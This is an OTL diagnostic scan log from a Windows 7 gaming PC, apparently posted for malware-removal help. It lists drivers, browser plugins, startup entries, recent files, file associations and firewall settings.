DRV:64bit: - [2009/06/10 13:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 13:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 13:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2009/07/13 18:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {21A51130-7285-49FE-B3F6-2385CC71CDEA}
IE:64bit: - HKLM\..\SearchScopes\{21A51130-7285-49FE-B3F6-2385CC71CDEA}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {21A51130-7285-49FE-B3F6-2385CC71CDEA}
IE - HKLM\..\SearchScopes\{21A51130-7285-49FE-B3F6-2385CC71CDEA}: "URL" = http://www.bing.com/...rc=IE-SearchBox
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\..\SearchScopes,DefaultScope = {21A51130-7285-49FE-B3F6-2385CC71CDEA}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.4.0: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\3.0.40624.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=14.0.8117.0416: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
 
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}
CHR - homepage: http://www.google.com/
CHR - plugin: Error reading preferences file
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\
CHR - Extension: YouTube = C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Google Wallet = C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\
 
O1 HOSTS File: ([2009/06/10 14:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O2 - BHO: (MSS+ Identifier) - {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4:64bit: - HKLM..\Run: [Launch LCore] C:\Program Files\Logitech Gaming Software\LCore.exe (Logitech Inc.)
O4:64bit: - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [AVG_UI] C:\Program Files (x86)\AVG\AVG2015\avgui.exe (AVG Technologies CZ, s.r.o.)
O4 - HKLM..\Run: [ControlCenter3] C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe (Brother Industries, Ltd.)
O4 - HKLM..\Run: [Corsair laver] C:\Program Files (x86)\Corsair\K90 Keyboard\K90Hid.exe (Corsair Components  Inc)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [RUSB3MON] C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe (Renesas Electronics Corporation)
O4 - HKLM..\Run: [SDTray] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe (Safer-Networking Ltd.)
O4 - HKLM..\Run: [StartCCC] D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe (Advanced Micro Devices, Inc.)
O4 - HKCU..\Run: [AVG-Secure-Search-Update_0214c] C:\Users\Joe\AppData\Roaming\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe /PROMPT /mid=92b95ff63cb347d3b5a4057438330a1c-a1039ab05693988e6915dc70dba9c5f34cd570fc /CMPID=0214c File not found
O4 - HKCU..\Run: [AVG-Secure-Search-Update_0913a] C:\Users\Joe\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 92b95ff63cb347d3b5a4057438330a1c-a1039ab05693988e6915dc70dba9c5f34cd570fc --CMPID 0913a File not found
O4 - HKCU..\Run: [EADM] C:\Program Files (x86)\Origin\Origin.exe (Electronic Arts)
O4 - HKCU..\Run: [Raptr] C:\Program Files (x86)\Raptr\raptrstub.exe (Raptr, Inc)
O4 - HKCU..\Run: [Steam] C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKCU\..Trusted Domains: blank ([]about in Computer)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{08750C39-93C6-4653-BBA5-3CF6C80BD3FF}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{ED16AFC5-67AC-4989-ABC2-A5E4B3CC75B9}: DhcpNameServer = 192.168.1.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\SDWinLogon: DllName - (SDWinLogon.dll) -  File not found
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/10/07 19:20:40 | 000,045,056 | R--- | M] () - E:\Autorun.exe -- [ CDFS ]
O32 - AutoRun File - [2006/10/07 19:38:55 | 000,000,159 | R--- | M] () - E:\Autorun.inf -- [ CDFS ]
O33 - MountPoints2\{13dc140f-08e2-11e3-a64f-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{13dc140f-08e2-11e3-a64f-806e6f6e6963}\Shell\AutoRun\command - "" = E:\Autorun.exe -- [2006/10/07 19:20:40 | 000,045,056 | R--- | M] ()
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/11/02 14:46:27 | 000,000,000 | ---D | C] -- C:\Users\Joe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AGOT
[2014/11/02 09:53:14 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wot Numbers
[2014/11/01 22:33:11 | 000,000,000 | ---D | C] -- C:\Users\Joe\Documents\Paradox Interactive
[2014/11/01 10:01:53 | 000,000,000 | ---D | C] -- C:\Users\Joe\AppData\Roaming\Wot Numbers
[2014/10/21 20:16:59 | 000,000,000 | ---D | C] -- C:\Users\Joe\AppData\Roaming\AVG2015
[2014/10/21 20:15:38 | 000,000,000 | ---D | C] -- C:\ProgramData\AVG2015
[2014/10/21 20:03:51 | 000,000,000 | ---D | C] -- C:\Users\Joe\AppData\Local\Avg2015
[2014/10/04 09:07:28 | 000,000,000 | ---D | C] -- C:\ProgramData\ATI
[2014/10/04 09:07:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\AMD AVT
[2014/10/04 09:07:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
 
========== Files - Modified Within 30 Days ==========
 
[2014/11/02 15:49:02 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/11/02 15:03:00 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/11/02 15:01:02 | 000,000,370 | ---- | M] () -- C:\Windows\tasks\WpsUpdateTask_Joe.job
[2014/11/02 14:58:59 | 000,025,632 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/11/02 14:58:59 | 000,025,632 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/11/02 14:57:50 | 000,784,286 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/11/02 14:57:50 | 000,663,422 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/11/02 14:57:50 | 000,122,788 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/11/02 14:51:59 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/11/02 14:51:52 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/11/02 14:51:51 | 4227,141,630 | -HS- | M] () -- C:\hiberfil.sys
[2014/11/01 22:00:32 | 000,000,222 | ---- | M] () -- C:\Users\Joe\Desktop\Crusader Kings II.url
[2014/10/27 20:58:29 | 000,002,183 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/10/21 20:16:16 | 000,000,965 | ---- | M] () -- C:\Users\Public\Desktop\AVG 2015.lnk
[2014/10/20 03:21:01 | 000,266,992 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
 
========== Files Created - No Company Name ==========
 
[2014/11/01 22:00:32 | 000,000,222 | ---- | C] () -- C:\Users\Joe\Desktop\Crusader Kings II.url
[2014/10/21 20:16:16 | 000,000,965 | ---- | C] () -- C:\Users\Public\Desktop\AVG 2015.lnk
[2014/09/15 18:19:58 | 000,038,912 | ---- | C] () -- C:\Windows\SysWow64\kdbsdk32.dll
[2014/08/13 11:11:10 | 000,215,416 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/08/13 11:11:10 | 000,076,888 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/04/27 15:19:36 | 000,007,680 | -HS- | C] () -- C:\ProgramData\reg546ms.dll
[2014/04/27 15:13:55 | 000,005,120 | -HS- | C] () -- C:\ProgramData\reg441tiff.lib
[2013/09/22 21:05:52 | 000,000,255 | ---- | C] () -- C:\Windows\Brpfx04a.ini
[2013/09/22 21:05:52 | 000,000,094 | ---- | C] () -- C:\Windows\brpcfx.ini
[2013/09/22 21:05:40 | 000,000,410 | ---- | C] () -- C:\Windows\BRWMARK.INI
[2013/09/22 21:05:40 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\BD7840W.DAT
[2013/09/22 21:05:22 | 000,106,496 | ---- | C] () -- C:\Windows\SysWow64\BrMuSNMP.dll
[2013/09/22 21:05:22 | 000,000,066 | ---- | C] () -- C:\Windows\Brfaxrx.ini
[2013/09/22 21:05:22 | 000,000,000 | ---- | C] () -- C:\Windows\brdfxspd.dat
[2013/09/22 21:05:21 | 000,045,056 | ---- | C] () -- C:\Windows\SysWow64\BRTCPCON.DLL
[2013/09/22 21:05:20 | 000,000,114 | ---- | C] () -- C:\Windows\SysWow64\BRLMW03A.INI
[2013/08/21 15:32:51 | 001,192,831 | ---- | C] () -- C:\Windows\unins001.exe
[2013/08/21 15:32:51 | 000,010,753 | ---- | C] () -- C:\Windows\unins001.dat
[2013/08/21 15:32:08 | 001,193,175 | ---- | C] () -- C:\Windows\unins000.exe
[2013/08/21 15:32:08 | 000,038,771 | ---- | C] () -- C:\Windows\unins000.dat
[2013/08/16 17:01:13 | 000,776,408 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/03/28 19:13:14 | 000,798,734 | ---- | C] () -- C:\Windows\SysWow64\amdocl_ld32.exe
[2013/03/28 19:13:12 | 000,995,342 | ---- | C] () -- C:\Windows\SysWow64\amdocl_as32.exe
 
========== ZeroAccess Check ==========
 
[2009/07/13 21:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 19:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 19:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 18:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 20:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 18:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/11/02 09:51:34 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\ActiveDossierUploader
[2014/10/21 20:16:59 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\AVG2015
[2013/08/21 15:32:08 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Corsair Vengeance
[2014/04/27 18:35:09 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\GameMaker-Studio
[2013/09/15 21:04:04 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Kingsoft
[2013/08/21 15:37:18 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Leadertech
[2014/04/19 12:59:03 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\library_dir
[2013/08/22 08:49:19 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Origin
[2014/11/02 14:52:14 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Raptr
[2014/11/02 09:43:27 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\TS3Client
[2013/08/21 15:25:32 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\TuneUp Software
[2014/04/17 22:35:37 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Wargaming.net
[2014/11/02 11:39:12 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\Wot Numbers
[2014/04/19 21:38:01 | 000,000,000 | ---D | M] -- C:\Users\Joe\AppData\Roaming\WOT Statistics
 
========== Purity Check ==========
 
 

< End of report >

 

OTL Extras logfile created on: 11/2/2014 3:52:08 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Joe\Downloads
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
15.92 Gb Total Physical Memory | 8.55 Gb Available Physical Memory | 53.72% Memory free
31.83 Gb Paging File | 23.58 Gb Available in Paging File | 74.10% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 119.14 Gb Total Space | 10.87 Gb Free Space | 9.12% Space Free | Partition Type: NTFS
Drive D: | 465.76 Gb Total Space | 387.52 Gb Free Space | 83.20% Space Free | Partition Type: NTFS
Drive E: | 4.36 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: JOE-PC | User Name: Joe | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe:*:Enabled:Spybot-S&D 2 Tray Icon -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe:*:Enabled:Spybot-S&D 2 Scanner Service -- (Safer-Networking Ltd.)
